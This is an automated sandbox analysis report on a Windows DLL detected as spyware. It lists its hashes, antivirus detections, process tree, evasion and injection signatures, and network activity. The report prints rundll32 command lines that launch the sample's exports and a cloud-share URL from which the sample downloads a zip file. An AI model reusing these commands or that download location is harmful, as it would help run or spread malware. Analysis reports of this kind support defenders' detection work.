Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll

Overview

General Information

Sample name:SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll
Analysis ID:1432434
MD5:6aa05404541ee29201cdcc5655fc85e5
SHA1:8f7053ac558eef33826d17e27eb4e31dcc1c4d81
SHA256:0519a9ec136042b2527aa3b8a4010941667df52938c2bc716877c4863be3b314
Tags:dll
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6556 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6928 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 4284 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • WerFault.exe (PID: 7216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 672 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,A MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7312 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7444 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,B MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7464 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",A MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7472 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7480 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",B MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7496 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",dbkFCallWrapperAddr MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",__dbk_fcall_wrapper MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7512 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",TMethodImplementationIntercept MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 652 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 7520 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",F MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7540 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",E MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7560 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",C MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllReversingLabs: Detection: 47%
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllVirustotal: Detection: 43%Perma Link
Machine Learning detection for sample
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllJoe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 213.13.26.154:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7CF9F8 FindFirstFileW,FindClose,8_2_6C7CF9F8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E8C20 FindFirstFileW,FindClose,8_2_6C7E8C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7CF414 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,8_2_6C7CF414
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E9194 FindFirstFileW,GetLastError,8_2_6C7E9194
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7CF9F8 FindFirstFileW,FindClose,11_2_6C7CF9F8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E8C20 FindFirstFileW,FindClose,11_2_6C7E8C20
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7CF414 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,11_2_6C7CF414
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E9194 FindFirstFileW,GetLastError,11_2_6C7E9194
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_1cfbaf5ca3181558ae23b5af2bc325da778f0_7522e4b5_14134091-3833-4e2b-8109-25cb573f144c\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_dbcb93d956ac28a5c3196766f9d12867aad21a0_7522e4b5_15e6224a-47ff-4b73-8f65-4223cf6f8bc8\

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 213.13.26.154 443Jump to behavior
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C9DB4D4 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,8_2_6C9DB4D4
Source: global trafficHTTP traffic detected: GET /dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English%20(United%20Kingdom) HTTP/1.1User-Agent: rundll32Host: cld.pt
Source: global trafficDNS traffic detected: DNS query: cld.pt
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 00000008.00000002.2944650618.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cld.pt/
Source: rundll32.exe, rundll32.exe, 0000000F.00000002.1858086486.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllString found in binary or memory: https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip
Source: rundll32.exe, 00000008.00000002.2944942141.0000000004278000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2944650618.00000000028EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English
Source: rundll32.exe, 00000008.00000002.2944650618.00000000028EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cld.pt/dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English%20(United%2
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownHTTPS traffic detected: 213.13.26.154:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C916A188_2_6C916A18
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C916A1811_2_6C916A18
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6C7D7214 appears 94 times
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 672
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: loaddll32.exe, 00000000.00000002.1766401686.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C.vBp
Source: classification engineClassification label: mal60.evad.winDLL@33/15@1/1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8F90B0 GetLastError,FormatMessageW,8_2_6C8F90B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C901C0C EnterCriticalSection,CoCreateInstance,LeaveCriticalSection,8_2_6C901C0C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C882940 FindResourceW,LoadResource,SizeofResource,LockResource,8_2_6C882940
Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0304PT[1].zipJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4284
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7512
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\aaf47a25-a6c8-4e54-b463-5c22b20da8e8Jump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,A
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllReversingLabs: Detection: 47%
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllVirustotal: Detection: 43%
Source: rundll32.exeString found in binary or memory: application/vnd.groove-help
Source: rundll32.exeString found in binary or memory: application/x-install-instructions
Source: rundll32.exeString found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: rundll32.exeString found in binary or memory: application/vnd.groove-help
Source: rundll32.exeString found in binary or memory: application/x-install-instructions
Source: rundll32.exeString found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: rundll32.exeString found in binary or memory: application/vnd.groove-help
Source: rundll32.exeString found in binary or memory: application/x-install-instructions
Source: rundll32.exeString found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: rundll32.exeString found in binary or memory: application/vnd.groove-help
Source: rundll32.exeString found in binary or memory: application/x-install-instructions
Source: rundll32.exeString found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: rundll32.exeString found in binary or memory: application/vnd.groove-help
Source: rundll32.exeString found in binary or memory: application/x-install-instructions
Source: rundll32.exeString found in binary or memory: application/vnd.adobe.air-application-installer-package+zip
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll"
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,A
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 672
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,B
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",A
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAX
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",B
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",dbkFCallWrapperAddr
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",__dbk_fcall_wrapper
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",TMethodImplementationIntercept
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",F
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",E
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",C
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 652
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 656
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,AJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll,BJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",AJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",ABACULEJOTOTALISTRAZIUNTESNAGANNINIANAXJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",BJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",dbkFCallWrapperAddrJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",__dbk_fcall_wrapperJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",TMethodImplementationInterceptJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",FJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",EJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",CJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dll",#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWindow found: window name: TButtonJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic file information: File size 6730240 > 1048576
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x589000
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Win32.SpywareX-gen.26133.21931.dllStatic PE information: section name: .didata
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C955520 push ecx; mov dword ptr [esp], edx8_2_6C955522
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7CCE68 push ecx; mov dword ptr [esp], edx8_2_6C7CCE69
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8B66C0 push ecx; mov dword ptr [esp], edx8_2_6C8B66C1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C991EC0 push ecx; mov dword ptr [esp], ecx8_2_6C991EC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7FDE24 push ecx; mov dword ptr [esp], edx8_2_6C7FDE26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8E079C push ecx; mov dword ptr [esp], eax8_2_6C8E079E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8A519C push ecx; mov dword ptr [esp], ecx8_2_6C8A51A1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E993C push ecx; mov dword ptr [esp], ecx8_2_6C7E993F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8A61D4 push ecx; mov dword ptr [esp], ecx8_2_6C8A61D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E92C4 push ecx; mov dword ptr [esp], edx8_2_6C7E92C8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C7E8288 push ecx; mov dword ptr [esp], ecx8_2_6C7E828C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8E03BC push ecx; mov dword ptr [esp], eax8_2_6C8E03C0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_6C8AA354 push ecx; mov dword ptr [esp], edx8_2_6C8AA355
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C955520 push ecx; mov dword ptr [esp], edx11_2_6C955522
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7CCE68 push ecx; mov dword ptr [esp], edx11_2_6C7CCE69
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8B66C0 push ecx; mov dword ptr [esp], edx11_2_6C8B66C1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C991EC0 push ecx; mov dword ptr [esp], ecx11_2_6C991EC4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7FDE24 push ecx; mov dword ptr [esp], edx11_2_6C7FDE26
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8E079C push ecx; mov dword ptr [esp], eax11_2_6C8E079E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8A519C push ecx; mov dword ptr [esp], ecx11_2_6C8A51A1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E993C push ecx; mov dword ptr [esp], ecx11_2_6C7E993F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C8A61D4 push ecx; mov dword ptr [esp], ecx11_2_6C8A61D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_6C7E92C4 push ecx; mov dword ptr [esp], edx11_2_6C7E92C8
